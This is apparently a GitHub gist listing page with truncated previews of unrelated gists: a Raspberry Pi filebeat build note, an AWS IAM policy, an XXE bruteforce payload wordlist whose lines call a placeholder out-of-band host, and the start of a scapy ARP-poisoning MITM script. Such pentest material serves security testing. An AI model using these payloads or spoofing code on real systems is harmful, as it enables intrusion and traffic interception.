At time of writing elastic.co does not provide ARM builds for raspberry. This tutorial describes how to compile e.g. filebeat and run in on Raspberry Pi3.
You'll need Go (>1.8) and Pyhton with virtualenv.
SecuritySamurai securitysamurai
honoki
/ xxe-payloads.txt
Last active
March 27, 2024 18:49
XXE bruteforce wordlist including local DTD payloads from https://github.com/GoSecure/dtd-finder
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x SYSTEM "http://xxe-doctype-system.yourdomain[.]com/"><x /> | |
| <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x PUBLIC "" "http://xxe-doctype-public.yourdomain[.]com/"><x /> | |
| <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY xxe SYSTEM "http://xxe-entity-system.yourdomain[.]com/">]><x>&xxe;</x> | |
| <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY xxe PUBLIC "" "http://xxe-entity-public.yourdomain[.]com/">]><x>&xxe;</x> | |
| <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY % xxe SYSTEM "http://xxe-paramentity-system.yourdomain[.]com/">%xxe;]><x/> | |
| <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY % xxe PUBLIC "" "http://xxe-paramentity-public.yourdomain[.]com/">%xxe;]><x/> | |
| <?xml version="1.0" encoding="utf-8" standalone="no" ?><x xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://xxe-xsi-schemalocation.y |
rbn15
/ arpspoofer.py
Created
August 11, 2019 09:51
Written python2.7, the program automates the process of MITM sniffing attack using ARP poisoning.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from scapy.all import * | |
| def getmac(targetip): | |
| arppacket= Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(op=1, pdst=targetip) | |
| targetmac= srp(arppacket, timeout=2 , verbose= False)[0][0][1].hwsrc | |
| return targetmac | |
| def spoofarpcache(targetip, targetmac, sourceip): | |
| spoofed= ARP(op=2 , pdst=targetip, psrc=sourceip, hwdst= targetmac) | |
| send(spoofed, verbose= False) |
quiver
/ iam-policy.json
Last active
April 23, 2024 07:02
How to connect to Amazon RDS PostgreSQL with IAM credentials
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| { | |
| "Version": "2012-10-17", | |
| "Statement": [ | |
| { | |
| "Effect": "Allow", | |
| "Action": [ | |
| "rds-db:connect" | |
| ], | |
| "Resource": [ | |
| "arn:aws:rds-db:region:account-id:dbuser:dbi-resource-id/database-user-name" |
andig
/ elastic-pi.md
Last active
January 6, 2022 18:28